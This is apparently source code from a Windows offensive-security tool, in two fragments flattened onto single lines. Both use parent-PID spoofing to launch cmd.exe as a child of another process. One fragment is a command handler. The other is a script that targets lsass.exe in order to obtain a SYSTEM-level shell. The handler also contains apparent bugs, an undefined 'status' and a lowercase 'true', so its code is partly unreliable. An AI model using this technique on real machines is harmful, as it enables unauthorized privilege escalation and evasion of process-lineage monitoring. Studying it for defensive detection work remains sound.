def spoof(args): if args['candidates'] == True: printT("Candidates:") esc = Escalation() esc.printCandidatesSpoofPPID() if args['pid'] == None: logging.error("A pid has to be selected") else: printT("Trying to exploit parent PID Spoofing...") esc = Escalation() targetPID = args['pid'] esc.spoofPPID(ppid=targetPID, appName="c:\\windows\\system32\\cmd.exe", cmdLine=None, lpProcessAttributes=None, lpThreadAttributes=None, bInheritHandles=0, creationFlags=(CREATE_NEW_CONSOLE | EXTENDED_STARTUPINFO_PRESENT), lpEnvironment=None, lpCurrentDirectory=None) if status == true: printT("Process created") else: logging.error("Impossible to create the new process")
# -*- coding: UTF-8 -*- # By Quentin HARDY ([email protected]) - bobsecq import sys sys.path.append('../') from utils import * configureLogging() from escalation import Escalation esc = Escalation() esc.printCandidatesSpoofPPID() ppidLSASS = getPIDfromName('lsass.exe') esc.spoofPPID(ppid=ppidLSASS, appName="c:\\windows\\system32\\cmd.exe", cmdLine=None, lpProcessAttributes=None, lpThreadAttributes=None, bInheritHandles=0, creationFlags=(CREATE_NEW_CONSOLE | EXTENDED_STARTUPINFO_PRESENT), lpEnvironment=None, lpCurrentDirectory=None)